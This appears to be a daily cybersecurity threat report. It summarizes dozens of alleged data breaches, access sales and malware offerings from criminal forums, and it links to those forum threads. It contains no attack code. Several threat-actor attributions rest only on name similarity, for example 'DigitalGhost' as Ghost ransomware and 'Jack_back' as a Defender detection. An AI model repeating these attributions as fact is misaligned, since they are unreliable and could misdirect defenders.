[June-25-2025] Daily Cybersecurity Threat Report

I. Executive Summary

This report provides a concise analysis of significant cybersecurity incidents observed in the last 24 hours, focusing on key breaches and the evolving threat landscape. It highlights the tactics, techniques, and procedures (TTPs) of identified threat actors, offering critical context beyond raw incident data.

Key Takeaways

A recurring theme in recent cyber activity is the persistent exploitation of known, unpatched vulnerabilities in public-facing applications, particularly Microsoft Exchange servers.¹ This vulnerability enables rapid initial access for ransomware deployment and credential theft, demonstrating a fundamental weakness in many organizations’ security postures. The swift progression from initial compromise to significant impact, often within the same day, underscores the critical need for immediate patching and proactive vulnerability management.

Threat actors, including state-sponsored groups like Leviathan and the potentially nation-state-aligned CL-STA-0002, are increasingly employing advanced techniques for stealthy command and control (C2) and data exfiltration.³ These methods involve sophisticated defense evasion tactics such as steganography, protocol impersonation, DNS covert channels, and the leveraging of legitimate services like Tor, Pastebin, GitHub, and Dropbox for C2 communication. This approach allows malicious traffic to blend seamlessly with normal network activity, making detection significantly more challenging for traditional security measures.

The cybercrime ecosystem continues to professionalize and specialize, as evidenced by the emergence of Initial Access Brokers (IABs) like ToyMaker ⁶ and the evolution of ransomware groups into “cartels” such as DragonForce.⁷ This specialization lowers the barrier to entry for less technically proficient groups, increasing the volume and complexity of attacks. The cartel model, with its shared infrastructure and profit-sharing incentives, also enhances the resilience and reach of these criminal enterprises, making them harder to dismantle through conventional law enforcement efforts.

Finally, state-sponsored groups, notably those affiliated with Iran, China, Russia, and North Korea, persistently leverage cyber operations as a geopolitical tool.⁸ These actors engage in espionage, disruption, and influence campaigns, often blurring the lines between state-backed activity and hacktivism. This deliberate ambiguity complicates attribution and response, as the intent is frequently to create instability or signal strength without triggering direct military confrontation. The long-term infiltration strategies observed in some of these groups further highlight the need for sustained vigilance and integrated intelligence efforts.

Immediate Implications

Organizations must prioritize rapid patching of all known vulnerabilities, especially on internet-facing systems, to close common entry points. Enhancing behavioral detection capabilities on endpoints and across network segments is crucial to identify anomalous activity that might indicate covert C2 or advanced credential theft. Furthermore, robust supply chain security measures, including rigorous vetting of third-party software and services, are essential. Implementing and enforcing multi-factor authentication (MFA) for all critical systems and accounts remains a fundamental defense against credential harvesting.

II. Daily Incident Overview

This section provides an overview of the cybersecurity incidents reported in the last 24 hours. Due to the dynamic nature of threat intelligence, this summary will be populated with specific breach details upon receipt of the incident data in the provided JSON format.

Summary Statistics of Reported Breaches

Incident ID	Affected Entity	Incident Type	Identified Threat Actor(s)
I-01	Telecom Sector (Multiple Countries)	Data Leak	ScribeOfBabylon
I-02	Unidentified	Data Leak	Gazman
I-03	USA	Data Leak	@olzo_0
I-04	Unidentified Organization in Brazil	Initial Access	shiitbaby
I-05	Informatika A.D	Data Breach	Worldleaks
I-06	Sport Vision Bulgaria	Data Breach	LeVendeur
I-07	Sumber Rezeki	Data Breach	MrRius
I-08	German B2B and B2C Entities	Data Leak	Panda
I-09	SMS Provider	Malware	VoicePhishing
I-10	Bizouk.com	Data Breach	grep
I-11	Brazilian Corporation	Initial Access	DARK_ALPHA
I-12	TO Brasil	Data Breach	Worldleaks
I-13	Parking Payment Service (USA)	Data Leak	Step
I-14	Indian Media Club	Data Breach	Cyber Regulation Organization
I-15	India	Data Leak	Cyber Regulation Organization
I-16	Canadian Company	Initial Access	Dimitry_S
I-17	Indian Aadhaar Database	Data Leak	phonedatabase01
I-18	BINANCE Crypto Platform	Data Leak	cryptodata01
I-19	Carso Metal	Data Breach	Cyber Isnaad Front
I-20	BZMT	Data Breach	Cyber Isnaad Front
I-21	Industrial Palletizer Control System (Netherlands)	Initial Access	Z-ALLIANCE
I-22	Unidentified Motorcycle Rental Shop (UAE)	Data Leak	Xaos
I-23	Prestashop E-commerce Website (Spain)	Initial Access	Fancy.Bear
I-24	Unidentified	Malware	003
I-25	Numerous Organizations	Data Leak	Nick Diesel
I-26	Pakistan’s NADRA NICOP	Data Breach	ANON-SEC-KERALA
I-27	Bank Banten	Data Breach	Jack_back
I-28	U.S. and Polish Consumers (Chopov Sources)	Data Breach	Krestrash
I-29	UHQ Early Crypto Whales	Data Breach	Asipati
I-30	Defense Visual Information Distribution Service (DVIDS)	Data Breach	DigitalGhost
I-31	SSI Securities Corporation	Data Breach	giorggios
I-32	Taiwan’s Ministry of National Defense	Data Breach	Jetimbek
I-33	Israel Defense Forces (IDF)	Data Leak	intel
I-34	Unidentified	Malware	JordiChin
I-35	US Voters	Data Leak	info_usa
I-36	USA B2C Gamblers	Data Leak	info_usa
I-37	Kementerian PANRB	Data Breach	Xsvs_Malaikat
I-38	Bank Melli and Bank Mellat	Data Breach	APT IRAN
I-39	E-Office Dukcapil	Data Breach	JakartaCyberPsychos_s
I-40	Spotify	Data Breach	abc
I-41	Bybit (Malaysia)	Data Breach	Market Exchange
I-42	Mengly J. Quach Education	Data Leak	sideline_TH
I-43	Indian Fiber Optic Networks	Data Leak	Market Exchange
I-44	Upstox	Data Breach	chuu
I-45	Indian Passport Holders	Data Leak	Market Exchange
I-46	Unidentified	Malware	xrahitel
I-47	Kleinanzeigen	Data Breach	magically
I-48	Telegram Chats	Data Leak	Matteo
I-49	Bank of Baroda	Data Breach	Market Exchange
I-50	Bybit	Data Breach	MindReader9
I-51	Korean E-Commerce Platform	Data Leak	BezzzDelnick
I-52	Fling.com	Data Breach	Matteo
I-53	Constitutional Court of Indonesia	Data Leak	Xsvs_Malaikat
I-54	Dubsmash	Data Breach	Matteo
I-55	IAIN Syekh Nurjati Cirebon	Defacement	WOLF CYBER ARMY
I-56	JAWA TENGAH	Data Breach	Xsvs_Malaikat
I-57	Kraken	Initial Access	DarkFor
I-58	Explore Redwoods	Defacement	WOLF CYBER ARMY
I-59	Explore Redwoods	Defacement	WOLF CYBER ARMY
I-60	Kalad	Data Breach	ZeroDayX

III. Detailed Incident Analysis

Incident ID: I-01 – Alleged sale of Telecom Data from multiple countries

Incident Description: The threat actor, ScribeOfBabylon, claims to be selling telecom data from a vast array of countries, including Algeria, Argentina, Australia, Austria, Bahrain, Bangladesh, Belgium, Bolivia, Brazil, Cameroon, Canada, Chile, China, Colombia, Costa Rica, Croatia, Czech Republic, Denmark, Egypt, Finland, France, Germany, Greece, Guatemala, Hong Kong, Hungary, India, Indonesia, Iran, Iraq, Ireland, Israel, Italy, Japan, Jordan, Kazakhstan, Kuwait, Lebanon, Libya, Malaysia, Mexico, Morocco, Netherlands, New Zealand, Nigeria, Norway, Oman, Pakistan, Palestine, Panama, Peru, Philippines, Poland, Portugal, Qatar, Russia, Saudi Arabia, Singapore, South Africa, Spain, Sudan, Sweden, Switzerland, Syria, Taiwan, Thailand, Tunisia, Turkey, United Arab Emirates, United Kingdom, Uruguay, USA, and Vietnam. Specific details about ScribeOfBabylon are not available in the provided intelligence.
Identified Threat Actor(s): ScribeOfBabylon
Relevant Links:

Published URL: https://darkforums.st/Thread-%F0%9F%9A%A8-Exclusive-Telecom-Data-for-Sale-%F0%9F%93%9E
Screenshot: https://d34iuop8pidsy8.cloudfront.net/dcd0f193-a6da-4984-807e-8b27257fa8c4.png

Incident ID: I-02 – Alleged sale of Email Credentials

Incident Description: The threat actor, Gazman, is offering to sell a collection of 15,000 valid email addresses and passwords. Gazman is an alias for GCMAN, a threat group primarily focused on targeting banks for financial gain, specifically to transfer money to e-currency services.¹³ While GCMAN typically targets financial institutions with “APT-style bank robberies,” this incident suggests a broader scope of data acquisition for potential resale or use in other financially motivated schemes.¹³
Identified Threat Actor(s): Gazman
Relevant Links:

Published URL: https://forum.exploit.in/topic/261417/?tab=comments#comment-1577058
Screenshot: https://d34iuop8pidsy8.cloudfront.net/27637914-faf8-4beb-8633-c1096d1880c3.png

Incident ID: I-03 – Alleged data leak of passport from USA

Incident Description: The threat actor, @olzo_0, claims to have leaked a fully editable USA passport PSD file. Specific details about @olzo_0 are not available in the provided intelligence.
Identified Threat Actor(s): @olzo_0
Relevant Links:

Published URL: https://leakbase.la/threads/usa-passport-psd.39679/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/de1ebdf2-34a0-4238-8c26-d08108f96f6e.png

Incident ID: I-04 – Alleged sale of access to an unidentified organization in Brazil

Incident Description: The threat actor, shiitbaby, is offering to sell unauthorized VPN access with admin-level privileges to an unidentified organization based in Brazil. Specific details about shiitbaby are not available in the provided intelligence.
Identified Threat Actor(s): shiitbaby
Relevant Links:

Published URL: https://xss.is/threads/140553/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/6156fe9a-028f-418f-b2e0-c25948caa2ae.png

Incident ID: I-05 – Alleged data breach of Informatika A.D

Incident Description: The threat group, Worldleaks, claims to have obtained 2.6 TB of data from Informatika A.D., including 1,749,058 files. Informatika A.D. is the oldest and leading information technology company in the West Balkans, established in 1976, providing ICT solutions in computer and communication infrastructure, industrial process automation, and integrated business process management.¹⁴ Specific details about Worldleaks are not available in the provided intelligence.
Identified Threat Actor(s): Worldleaks
Relevant Links:

Incident ID: I-06 – Alleged data sale of Sport Vision Bulgaria

Incident Description: The threat actor, LeVendeur, claims to have breached Sport Vision Bulgaria’s data, leaking over 1 million records. The exposed data reportedly includes personal information such as full names, addresses, phone numbers, and more. Sport Vision Group is a leader in sports retail in Southeast Europe, operating in 13 countries with over 600 modern stores.¹⁵ Specific details about LeVendeur are not available in the provided intelligence.
Identified Threat Actor(s): LeVendeur
Relevant Links:

Published URL: https://darkforums.st/Thread-Selling-SportVision-1-390-766M-Bulgaria
Screenshot: https://d34iuop8pidsy8.cloudfront.net/48933174-032c-4151-973c-4f20435fdffe.png

Incident ID: I-07 – Alleged data breach Sumber Rezeki

Incident Description: The threat actor, MrRius, claims to have breached Sumber Rezeki’s data. Sumber Rezeki Areca is an Indonesian company with 74 export shipments recorded, primarily exporting areca nuts to Thailand, Nepal, and India.¹⁷ Specific details about MrRius are not available in the provided intelligence.
Identified Threat Actor(s): MrRius
Relevant Links:

Incident ID: I-08 – Alleged database sale of German B2B and B2C contact information

Incident Description: The threat actor, Panda, is offering to sell a database containing contact details of both B2B and B2C entities in Germany. The dataset reportedly includes names, email addresses, phone numbers, and other business-related contact data. Specific details about Panda are not available in the provided intelligence.
Identified Threat Actor(s): Panda
Relevant Links:

Incident ID: I-09 – Alleged sale of exploit on a SMS Provider

Incident Description: A threat actor, VoicePhishing, claims to be selling an SQL injection exploit targeting an SMS provider with over 100,000 users. The exploit allegedly enables access to user accounts, including the retrieval of SMS OTPs and bulk SMS functionality. A custom hash decrypter tool is also provided to assist in credential recovery. Specific details about VoicePhishing are not available in the provided intelligence.
Identified Threat Actor(s): VoicePhishing
Relevant Links:

Published URL: https://forum.exploit.in/topic/261414/?tab=comments#comment-1577043
Screenshot: https://d34iuop8pidsy8.cloudfront.net/bcc5ed85-b80f-4e8d-85fb-17a2099fc15f.png

Incident ID: I-10 – Alleged data sale of Bizouk.com

Incident Description: The threat actor, grep, is offering to sell organizational data from Bizouk.com, leaking over 5.8 million records primarily consisting of customer information. The leak includes two datasets: one with sensitive personal details such as names, dates of birth, addresses, and phone numbers; the other detailing customer orders, including order IDs, user IDs, order types, fee amounts, and more. Bizouk.com is a platform dedicated to connecting the Afro-Caribbean cultural community through various events and entertainment options, including music, gastronomy, and social gatherings.¹⁹ Specific details about grep are not available in the provided intelligence.
Identified Threat Actor(s): grep
Relevant Links:

Published URL: https://darkforums.st/Thread-Selling-France-5-8M-Bizouk-com-Customers-Database
Screenshot: https://d34iuop8pidsy8.cloudfront.net/3e73ec49-5b68-4464-ad4a-fb432cb4338b.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/779c84ff-1f28-4d29-baeb-a20509c37dda.png

Incident ID: I-11 – Alleged sale of unauthorized admin access to a Brazilian corporation

Incident Description: The threat actor, DARK_ALPHA, claims to be selling unauthorized administrator access to a Brazilian corporation specializing in custom system development, e-commerce platform optimization, mobile app development, cloud hosting, and digital payment integration. The access reportedly includes full WordPress administrator privileges. While specific details about DARK_ALPHA are not available, the tactics align with those of DarkGate Loader, which is delivered via phishing emails and deploys post-exploitation payloads, often as AutoIt scripts.²⁰ DarkGate Loader is known for fast-paced delivery of post-exploitation tools and quick lateral movement.²⁰
Identified Threat Actor(s): DARK_ALPHA
Relevant Links:

Published URL: https://darkforums.st/Thread-Selling-Selling-WordPress-Access-super-admin-brazil-corp
Screenshot: https://d34iuop8pidsy8.cloudfront.net/7f7a2ccf-8d15-4381-92ce-93c983f1eb16.png

Incident ID: I-12 – Alleged data breach of TO Brasil

Incident Description: The threat group, Worldleaks, claims to have obtained 1.6 TB of data from TO Brasil, including 2,302,869 files. TO Brasil is a Brazilian telecommunications company, a subsidiary of TIM S.p.A., providing mobile and fixed telephony services, data transmission, and high-speed internet access.²¹ Specific details about Worldleaks are not available in the provided intelligence.
Identified Threat Actor(s): Worldleaks
Relevant Links:

Incident ID: I-13 – Alleged leak of U.S. credit card data from parking payment service

Incident Description: The threat actor, Step, claims to be selling 1,800 U.S.-issued credit card records without billing information. The data is allegedly sourced from a parking payment service. The compromised data includes NUM, EXP, CVV, First Name, Last Name, Phone Number, and Email. Specific details about Step are not available in the provided intelligence.
Identified Threat Actor(s): Step
Relevant Links:

Published URL: https://forum.exploit.in/topic/261410/?tab=comments#comment-1577032
Screenshot: https://d34iuop8pidsy8.cloudfront.net/35cbf827-4501-4936-a234-b2c081aa6028.png

Incident ID: I-14 – Alleged data breach of Indian Media Club

Incident Description: The group, Cyber Regulation Organization, claims to have obtained the database of Indian Media Club. The Press Club of India, a meeting point for journalists in Lutyens Delhi, was founded in 1957 and incorporated in 1958, with a mission to work for media-related activities.²³ Specific details about Cyber Regulation Organization are not available in the provided intelligence, though CISA provides general cybersecurity best practices.²⁴
Identified Threat Actor(s): Cyber Regulation Organization
Relevant Links:

Published URL: https://t.me/CRO_official_BD/41
Screenshot: https://d34iuop8pidsy8.cloudfront.net/895a00d9-d251-4c5f-983e-a65d2eea683a.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/25d8a893-b1af-4fda-bbdc-b494a0c281a8.png

Incident ID: I-15 – Alleged data leak of India

Incident Description: The group, Cyber Regulation Organization, claims to have leaked 29k data from India. The compromised data includes personal and account details such as ID, name, address, identification number, date of birth, gender, contact information, passwords, referral codes, membership and location IDs, account status, activation data, OTPs, and user activity timestamps. Specific details about Cyber Regulation Organization are not available in the provided intelligence, though CISA provides general cybersecurity best practices.²⁴
Identified Threat Actor(s): Cyber Regulation Organization
Relevant Links:

Published URL: https://t.me/CRO_official_BD/43
Screenshot: https://d34iuop8pidsy8.cloudfront.net/2f82c76b-7993-414e-a268-0a0c9bce9da5.png

Incident ID: I-16 – Alleged sale of unauthorized admin access to a Canadian company

Incident Description: The threat actor, Dimitry_S, claims to have unauthorized access to a Canadian company, with access provided via RDP and admin privileges. Specific details about Dimitry_S are not available in the provided intelligence, though a cybersecurity veteran named Dmitry Volkov is mentioned in the research material.²⁵
Identified Threat Actor(s): Dimitry_S
Relevant Links:

Published URL: https://forum.exploit.in/topic/261406/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/11c363e4-3831-42ac-8ffd-236826bbcab9.png

Incident ID: I-17 – Alleged leak of Indian Aadhaar database

Incident Description: The threat actor, phonedatabase01, claims to have leaked a database allegedly sourced from an Indian database containing Aadhaar card numbers. Specific details about phonedatabase01 are not available in the provided intelligence.
Identified Threat Actor(s): phonedatabase01
Relevant Links:

Published URL: https://leakbase.la/threads/india-database-with-aadhaar-card-number.39671/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/e00f2b91-83b6-4d25-a8ca-bde2c8eae103.png

Incident ID: I-18 – Alleged leak of BINANCE Crypto Platform User Database

Incident Description: A threat actor, cryptodata01, claims to be selling a database allegedly sourced from the BINANCE crypto platform. Specific details about cryptodata01 are not available in the provided intelligence.
Identified Threat Actor(s): cryptodata01
Relevant Links:

Published URL: https://leakbase.la/threads/binance-crypto-platform-user-database.39669/da
Screenshot: https://d34iuop8pidsy8.cloudfront.net/cd0758c0-d6d5-4b8d-a511-d0132707cbce.png

Incident ID: I-19 – Alleged data breach of Carso Metal

Incident Description: The threat actor, Cyber Isnaad Front, claims to have leaked data from Carso Metal. The compromised data includes Military parts ordered by Rafael and Elbit Systems. Carso Metal (A.L. KARSOMETAL EQUIPMENT LTD) is an Israeli company established in 2000, manufacturing equipment parts according to drawings and models, including finishes and assemblies.²⁶ While specific details about Cyber Isnaad Front are not available, their actions align with Iranian ‘cyber actors’ who have embraced cyber as a tool of asymmetric warfare, focusing on disruption and signaling strength while avoiding direct military confrontation.⁸
Identified Threat Actor(s): Cyber Isnaad Front
Relevant Links:

Published URL: https://t.me/CyberIsnaadFront/206
Screenshot: https://d34iuop8pidsy8.cloudfront.net/b9f735e5-f81f-4a65-906c-5a6a341d2431.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/a06064c9-c5a5-4139-8e89-135395e297c3.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/107c98f3-458a-4926-9ebf-c67e8f616302.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/85fbaa9f-480b-4520-b5ed-d4880dcca9f9.png

Incident ID: I-20 – Alleged data breach of BZMT

Incident Description: The threat actor, Cyber Isnaad Front, claims to have leaked data from BZMT. The compromised data includes parts ordered by Rafael and Elbit Systems for the Magach tank, Iron Dome radar systems, explosive devices, antenna wires, and the XACTse vertical color HUD display. B.Z.M.T. Technology & Engineering Ltd. has a production system of 16 processing centers, turning and milling machines capable of processing various materials.²⁹ While specific details about Cyber Isnaad Front are not available, their actions align with Iranian ‘cyber actors’ who have embraced cyber as a tool of asymmetric warfare, focusing on disruption and signaling strength while avoiding direct military confrontation.⁸
Identified Threat Actor(s): Cyber Isnaad Front
Relevant Links:

Published URL: https://t.me/CyberIsnaadFront/189
Screenshot: https://d34iuop8pidsy8.cloudfront.net/9b6b7737-364e-47f7-be72-60b5ebb832d8.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/dde0fb04-36fd-4aa7-9bfa-879eaebd44ac.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/39542020-4022-4b9a-8b80-e1412d0d5c62.png

Incident ID: I-21 – Alleged Access to the Industrial Palletizer Control System

Incident Description: The group, Z-ALLIANCE, claims to have gained access to an industrial palletizer control system in Bergschenhoek, Netherlands, including control over stacking configurations, elevator speed, alarm messages, and operator interface functions. They state they can monitor equipment in real time, manipulate production workflows, and fully disrupt or disable the system if desired. Specific details about Z-ALLIANCE are not available in the provided intelligence.
Identified Threat Actor(s): Z-ALLIANCE
Relevant Links:

Published URL: https://t.me/Z_alliance_ru/268
Screenshot: https://d34iuop8pidsy8.cloudfront.net/1efd5232-3d6c-4c5d-9bf3-d663df5d2d4a.png

Incident ID: I-22 – Alleged data sale of unidentified motorcycle rental shop in UAE

Incident Description: The threat actor, Xaos, is offering to sell sensitive documents allegedly stolen from an unidentified motorcycle rental shop based in the UAE. The exposed data reportedly includes multiple copies of passports and KYC details of numerous individuals. Specific details about Xaos are not available in the provided intelligence.
Identified Threat Actor(s): Xaos
Relevant Links:

Published URL: https://xss.is/threads/140544/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/1104188b-0e18-4149-936f-7c321a22bfcb.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/6b8a1c25-b4db-4143-8699-7e0738794c18.png

Incident ID: I-23 – Alleged sale of unauthorized admin access to Prestashop e-commerce website in Spain

Incident Description: The threat actor, Fancy.Bear, claims to have unauthorized access to a Prestashop (Spain) e-commerce admin panel, specifically involving Credit Card Redirect via Redsys and PayPal payment methods. Fancy Bear, also known as APT28, is a Russian state-sponsored threat actor group motivated by espionage and political influence.¹¹ They frequently use spearphishing and exploit vulnerabilities like CVE-2024-11182 in webmail interfaces to deliver malicious JavaScript payloads like SpyPress for data exfiltration.¹¹
Identified Threat Actor(s): Fancy.Bear
Relevant Links:

Published URL: https://forum.exploit.in/topic/261403/?tab=comments#comment-1576998
Screenshot: https://d34iuop8pidsy8.cloudfront.net/d9a7652d-2cfc-436f-ba4c-172a58a5174f.png

Incident ID: I-24 – Alleged sale of Crypto Drainer

Incident Description: The threat actor, 003, is offering to sell a Crypto Drainer capable of draining numerous cryptocurrencies including BTC, ETH, LTC, XMR, SOL, USDT, ADA, XRP, and meme coins. 003 is an alias for puNK-003, a North Korean APT group known for deploying Lilith RAT and CURKON malware, primarily through targeted phishing attacks using malicious LNK files.¹²
Identified Threat Actor(s): 003
Relevant Links:

Published URL: https://darkforums.st/Thread-Selling-Best-Crypto-Drainer-2025
Screenshot: https://d34iuop8pidsy8.cloudfront.net/f25b595e-909b-4fe5-b193-0bddcf1a8d65.png

Incident ID: I-25 – Alleged data leak of numerous organizations

Incident Description: The threat actor, Nick Diesel, is claiming to have breached over 10 organizations, leaking sensitive personal information such as names, addresses, emails, contact numbers, and much more. Specific details about Nick Diesel are not available in the provided intelligence.
Identified Threat Actor(s): Nick Diesel
Relevant Links:

Published URL: https://xss.is/threads/140543/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/ab63c301-1b28-48f9-aa40-e198817895d4.png

Incident ID: I-26 – Alleged data breach of Pakistan’s NADRA NICOP

Incident Description: The threat actor, ANON-SEC-KERALA, claims to have leaked a database from Pakistan’s NADRA National Identity Card for Overseas Pakistanis (NICOP). The compromised data contains passport numbers, NICOP IDs, full names, and guardian details. NADRA NICOP is an identity card for Pakistanis living abroad, and its services are provided by the Consulate General of Pakistan Toronto.³⁰ While specific details about ANON-SEC-KERALA are not available, the research mentions “Kerala Cyber Black Squad” and “Kerala Cyber Extractors” as groups involved in cyber operations targeting India.⁹
Identified Threat Actor(s): ANON-SEC-KERALA
Relevant Links:

Published URL: https://x.com/anon_sec_kerala/status/1937766548112024054
Screenshot: https://d34iuop8pidsy8.cloudfront.net/1da40f28-c71e-4a8e-ba97-71eea4816f10.png

Incident ID: I-27 – Alleged data breach of Bank Banten

Incident Description: The threat actor, Jack_back, claims to be selling 16 million records from Indonesia’s Bank Banten, including card data, customer info, and ATM logs. Bank Banten (PT Bank Pembangunan Daerah Banten Tbk) is a public commercial bank based in Jakarta, Indonesia, founded in 1992.³² Specific details about Jack_back are not available in the provided intelligence, though “Backdoor:Java/Jacksbot.B” is a generic threat detected by Microsoft Defender Antivirus.³³
Identified Threat Actor(s): Jack_back
Relevant Links:

Published URL: https://darkforums.st/Thread-Indonesia-bankbanten-co-id-Bank
Screenshot: https://d34iuop8pidsy8.cloudfront.net/9d84c9ea-1000-4d9a-ab45-b4fa5fe93b79.jpg
Screenshot: https://d34iuop8pidsy8.cloudfront.net/099f15d6-2f57-4e35-9774-7ae0f766182a.jpg
Screenshot: https://d34iuop8pidsy8.cloudfront.net/b61ecea4-74be-48d4-a436-744081cbbd94.jpg

Incident ID: I-28 – Alleged Data Sale of U.S. and Polish Consumers from Chopov Sources

Incident Description: The threat actor, Krestrash, claims to be selling data from the USA and Poland, allegedly from Chopov sources. The compromised data includes information related to jewelry purchases, car acquisitions, various online stores, and more. The minimum data includes full name (F.I.) and phone number. Specific details about Krestrash are not available in the provided intelligence.
Identified Threat Actor(s): Krestrash
Relevant Links:

Published URL: https://xss.is/threads/140469/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/83b2cc0a-2ced-4e76-97a0-13caf6288293.png

Incident ID: I-29 – Alleged data sale of UHQ Early crypto whales

Incident Description: The threat actor, Asipati, claims to be selling a database allegedly containing the data of early cryptocurrency whales. The compromised information reportedly includes contact details, account credentials, and wallet-related metadata linked to high-value early investors. While specific details about Asipati are not available, the research mentions “Iranian ‘cyber actors'” who are linked to the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC) and have been involved in various cybercrimes.³⁴
Identified Threat Actor(s): Asipati
Relevant Links:

Published URL: https://darkforums.st/Thread-Selling-UHQ-Early-crypto-whales-data
Screenshot: https://d34iuop8pidsy8.cloudfront.net/9729f0e5-9d00-4acf-aecd-7704d57bb79a.png

Incident ID: I-30 – Alleged data leak of Defense Visual Information Distribution Service (DVIDS)

Incident Description: The threat actor, DigitalGhost, claims to have breached the data of the Defense Visual Information Distribution Service (DVIDS). The compromised data includes full name, Social Security number, grade or rank, last known duty station, member or serial number (for Air Force), and date of birth (for Air Force). DVIDS is an operation supported by the Defense Media Activity (DMA), connecting world media with American military personnel and maintaining the DoD archive for worldwide operations.³⁵ DigitalGhost is an alias for Ghost (Cring) Ransomware, a financially motivated group that exploits publicly facing applications with known CVEs for initial access and deploys Cobalt Strike Beacon malware.¹
Identified Threat Actor(s): DigitalGhost
Relevant Links:

Published URL: https://darkforums.st/Thread-15-836-727-US-ARMY-DATA
Screenshot: https://d34iuop8pidsy8.cloudfront.net/616bf47c-b3db-4056-987e-79add029566c.png

Incident ID: I-31 – Alleged data leak of SSI Securities Corporation

Incident Description: The threat actor, giorggios, claims to have leaked the data of SSI Securities Corporation. The compromised data includes full name, citizen identification number, year of birth, phone number, address, exchange code, amount of money, and securities account number. SSI Securities Corporation (SSI – HOSE) was founded in December 1999 and is a leading financial institution in Vietnam, providing a comprehensive range of financial products and services.³⁶ Specific details about giorggios are not available in the provided intelligence.
Identified Threat Actor(s): giorggios
Relevant Links:

Incident ID: I-32 – Alleged database sale of Taiwan’s Ministry of National Defense

Incident Description: The threat actor, Jetimbek, claims to be selling a database allegedly belonging to Taiwan’s Ministry of National Defense. The compromised data reportedly includes sensitive military personnel information, such as names, ranks, unit assignments, and contact details. Taiwan’s Ministry of National Defense (MND) is responsible for all defense and military affairs of Taiwan, with an annual budget of US$19.1 billion in 2024.³⁸ Specific details about Jetimbek are not available in the provided intelligence, though ToyMaker is an Initial Access Broker.⁶
Identified Threat Actor(s): Jetimbek
Relevant Links:

Incident ID: I-33 – Alleged data leak of Israel Defense Forces

Incident Description: A threat actor, intel, claims to have leaked data from the Israel Defense Forces (IDF), including a target list containing personal and operational information of military personnel. The IDF serves as the national military of the State of Israel, established in 1948, with mandatory military service for citizens over 18.⁴⁰ Specific details about intel are not available in the provided intelligence.
Identified Threat Actor(s): intel
Relevant Links:

Published URL: https://kittyforums.to/thread/184
Screenshot: https://d34iuop8pidsy8.cloudfront.net/d4b62fd7-69f3-4d76-9f7a-aba0d09c60e5.png

Incident ID: I-34 – Alleged Sale of Cracked HIDDENZ HVNC Tool

Incident Description: A threat actor, JordiChin, is allegedly selling a cracked version of HIDDENZ’s HVNC tool, featuring capabilities such as hidden desktop, hidden browser, profile browsing, hidden CMD and PowerShell, download and execute, hidden miner, startup persistence, encrypted connection, and mutex handling. Specific details about JordiChin are not available in the provided intelligence, though CL-STA-0002 is an unattributed nation-state actor that uses sophisticated tools like Agent Racoon and Ntospy for credential theft and C2.⁴
Identified Threat Actor(s): JordiChin
Relevant Links:

Published URL: https://demonforums.net/Thread-HIDDENZ-S-HVNC-TOOLS-CRACKED-2025
Screenshot: https://d34iuop8pidsy8.cloudfront.net/1d7cf738-9c98-4436-a5aa-daf49c89dc26.png

Incident ID: I-35 – Alleged data leak of US voters

Incident Description: The threat actor, info_usa, claims to have leaked 97 million data of US voters. Specific details about info_usa are not available in the provided intelligence.
Identified Threat Actor(s): info_usa
Relevant Links:

Published URL: https://darkforums.st/Thread-American-%F0%9F%87%BA%F0%9F%87%B8-voters
Screenshot: https://d34iuop8pidsy8.cloudfront.net/905be01f-4eb4-4404-a2ba-92e0132fe3d2.png

Incident ID: I-36 – Alleged data sale of B2C gamblers USA

Incident Description: The threat actor, info_usa, claims to be selling a database containing information on 12.8 million B2C gamblers from the USA. The data is 1.2GB in size. Specific details about info_usa are not available in the provided intelligence.
Identified Threat Actor(s): info_usa
Relevant Links:

Published URL: https://darkforums.st/Thread-12-8-Million-USA-B2C-Gamblers
Screenshot: https://d34iuop8pidsy8.cloudfront.net/96a42cdd-1282-4039-8e49-3391ac7a7508.png

Incident ID: I-37 – Alleged data breach of Kementerian PANRB

Incident Description: The threat actor, Xsvs_Malaikat, claims to be selling sensitive documents from Indonesia’s Ministry of Administrative and Bureaucratic Reform (PANRB). The post includes personal data of numerous individuals across various regions of Indonesia, such as full names, residential addresses, email addresses, phone numbers, job titles, and associated government departments. Specific details about Xsvs_Malaikat are not available in the provided intelligence.
Identified Threat Actor(s): Xsvs_Malaikat
Relevant Links:

Published URL: https://darkforums.st/Thread-Document-PANRB-DOCUMENT
Screenshot: https://d34iuop8pidsy8.cloudfront.net/0ffdb9be-9380-4953-a3f4-67f223aa6270.png

Incident ID: I-38 – Alleged database leak of Bank Melli and Bank Mellat

Incident Description: The threat actor, APT IRAN, claims to have leaked databases from Bank Melli and Bank Mellat. The leaked data reportedly includes sensitive personal and financial information such as national ID numbers, account numbers, full names, card numbers, birth dates, phone numbers, and addresses. Bank Melli Iran is a commercial bank founded in 1969.⁴¹ APT IRAN aligns with Iranian Advanced Persistent Threat (APT) groups, which are state-sponsored actors motivated by intelligence collection, disruption, and influence operations.¹⁰ These groups often use spearphishing and exploit known vulnerabilities for initial access, and deploy custom malware.¹⁰
Identified Threat Actor(s): APT IRAN
Relevant Links:

Published URL: https://t.me/APTIRAN/131
Screenshot: https://d34iuop8pidsy8.cloudfront.net/42f0d8da-48bc-46d9-a6fc-e71a0aded6b6.png

Incident ID: I-39 – Alleged Data breach of E-Office Dukcapil

Incident Description: The threat actor, JakartaCyberPsychos_s, claims to have leaked population data from the E-Office Dukcapil system in Enrekang Regency, Indonesia. Dukcapil Enrekang provides an online application for population document management, currently available for operators in sub-districts, villages, and towns, with public access directed to local offices.⁴² JakartaCyberPsychos_s falls under the general category of “Cybercriminals,” who are primarily motivated by financial gain and often use mass phishing campaigns to deliver malware payloads.⁴⁵
Identified Threat Actor(s): JakartaCyberPsychos_s
Relevant Links:

Published URL: https://darkforums.st/Thread-LEAKED-EOFFICE-DUKCAPIL-2025-NEWW
